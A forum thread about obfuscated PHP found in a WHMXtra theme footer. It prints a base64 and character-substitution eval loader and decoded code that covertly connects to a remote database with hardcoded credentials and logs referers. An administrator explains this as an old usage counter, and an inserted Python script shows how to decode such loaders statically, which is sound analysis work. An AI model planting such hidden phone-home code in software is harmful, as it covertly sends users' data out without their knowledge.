WHMXtra Forums - Powered by vBulletin


  1. #1
    Junior Member
    Join Date
    May 2012
    Posts
    2

    Malware / Backdoor

    Hello, I seem to have found some malware on my new install of WHMXtra.
    $_F=__FILE__;$_X='Pz48P3BocA0KICAvLyBiMWNrIHRyMWNr NG5nIFxcDQokZGJfaDJzdCA9ICJlOS45by5lOC43aSI7IC8vIE gyc3QsIDNzMzFsbHkgbDJjMWxoMnN0IA0KJGRiXzNzNXIgPSAi ZHdzNHQ1Y2hfc3QxdDNzIjsgLy8gWTIzciBkMXQxYjFzNSAzcz VybjFtNSANCiRkYl9wMXNzID0gInN0MXQzcyI7IC8vWTIzciBk MXQxYjFzNSBwMXNzdzJyZCANCiRkYl9uMW01ID0gImR3czR0NW NoX3N0MXQzcyI7IC8vIFkyM3IgZDF0MWIxczUgbjFtNSANCiRk YiA9IG15c3FsX2Mybm41Y3QoJGRiX2gyc3QsJGRiXzNzNXIsJG RiX3Axc3MpOw0KJHJoMnN0ZzV0PWc1dDVudigiSFRUUF9SRUZF UkVSIik7DQpteXNxbF9zNWw1Y3RfZGIgKCRkYl9uMW01KSAyci BkNDUgKCJDMW5uMnQgYzJubjVjdCB0MiBkMXQxYjFzNSIpOw0K JHI1czNsdD0iSU5TRVJUIElOVE8gc3QxdDNzICg0ZCx3NWJzNH Q1LHQ0bTVkMXQ1KSBWQUxVRVMgKCdOVUxMJywgJyRyaDJzdGc1 dCcsIG4ydygpKSI7IC8vSW5zNXJ0IHRoNSB2MWwzNXMgNG50Mi B0aDUgYzJycjVjdCBkMXQxYjFzNQ0KbXlzcWxfcTM1cnkoJHI1 czNsdCkgMnIgZDQ1KG15c3FsXzVycjJyKCkpOw0KPz4=';eval (base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1 g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2 Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0 YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='


    // back tracking \\
    $db_host = "69.93.68.75"; // Host, usually localhost
    $db_user = "dwsitech_status"; // Your database username
    $db_pass = "status"; //Your database password
    $db_name = "dwsitech_status"; // Your database name
    $db = mysql_connect($db_host,$db_user,$db_pass);
    $rhostget=getenv("HTTP_REFERER");
    mysql_select_db ($db_name) or die ("Cannot connect to database");
    ...............


    LOCATED IN /usr/local/cpanel/whostmgr/docroot/themes/x/xtra/megamon/footer.php
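
Added example, not part of the original thread and not WHMXtra's code: a Python sketch that statically unwraps the two-layer scheme in post #1, where the second base64 string is a loader that base64-decodes `$_X` and then applies a `strtr()` character substitution before `eval`. Nothing is executed; the function names and the sample input (including the 192.0.2.10 address) are constructed for illustration.

```python
import base64
import re

# Outer wrapper: $_X='<payload b64>'; ... eval(base64_decode('<loader b64>'
WRAPPER = re.compile(
    r"\$_X\s*=\s*'([A-Za-z0-9+/=\s]+)'.*?"
    r"eval\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]+)'", re.S)
# Substitution step inside the decoded loader: strtr($_X,'from','to')
STRTR = re.compile(rb"strtr\(\$_X,\s*'([^']*)'\s*,\s*'([^']*)'\)")


def _b64(blob: str) -> bytes:
    # Forum software wraps long tokens with spaces; drop all whitespace first.
    return base64.b64decode("".join(blob.split()))


def deobfuscate(php_source: str) -> str:
    """Statically recover the hidden PHP text. Nothing is ever eval'd."""
    m = WRAPPER.search(php_source)
    if not m:
        raise ValueError("wrapper pattern not found")
    payload, loader = _b64(m.group(1)), _b64(m.group(2))
    s = STRTR.search(loader)
    if not s:
        raise ValueError("loader has no strtr() step; inspect it by hand")
    src, dst = s.group(1), s.group(2)
    n = min(len(src), len(dst))  # PHP strtr ignores the longer string's tail
    table = bytes.maketrans(src[:n], dst[:n])
    return payload.translate(table).decode("latin-1")


def make_sample() -> str:
    """Constructed test input: a harmless snippet wrapped the same way."""
    loader = (b"$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');"
              b"$_R=ereg_replace('__FILE__',\"'\".$_F.\"'\",$_X);eval($_R);$_R=0;$_X=0;")
    plain = b'?><?php $db_host = "192.0.2.10"; // constructed value ?>'
    inverse = bytes.maketrans(b"aouie123456", b"123456aouie")
    enc = base64.b64encode(plain.translate(inverse)).decode()
    wrapped = " ".join(enc[i:i + 50] for i in range(0, len(enc), 50))
    return ("$_F=__FILE__;$_X='%s';eval (base64_decode('%s'));"
            % (wrapped, base64.b64encode(loader).decode()))


if __name__ == "__main__":
    print(deobfuscate(make_sample()))
```

Reading the substitution alphabet out of the decoded loader, rather than hard-coding it, lets the same routine handle files where the packer used a different character mapping.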

  2. #2
    Administrator
    Join Date
    Jun 2012
    Posts
    2
    Originally that code was included by one of our coders to see how many
    of our customers were using that feature and whether it was worth
    developing it in the future. The code is no longer relevant and will be
    removed as it hasn't been needed since 2009 and we no longer do
    trackbacks.


    It is not malware or a backdoor. It simply sends a call to a no longer
    existing website that set a counter so we could determine how many
    people used the feature. It will be removed in the next update.

  3. #3
    Junior Member
    Join Date
    May 2012
    Posts
    2
    Hello Bora;

    Yes, this was clarified in an email with one of the admins of WHMXtra a while ago; my apologies for not updating the forum thread.

  4. #4
    Administrator
    Join Date
    Jun 2012
    Posts
    2
    No problem at all, I just wanted to update the thread, just in case there were other people reading the thread.


 
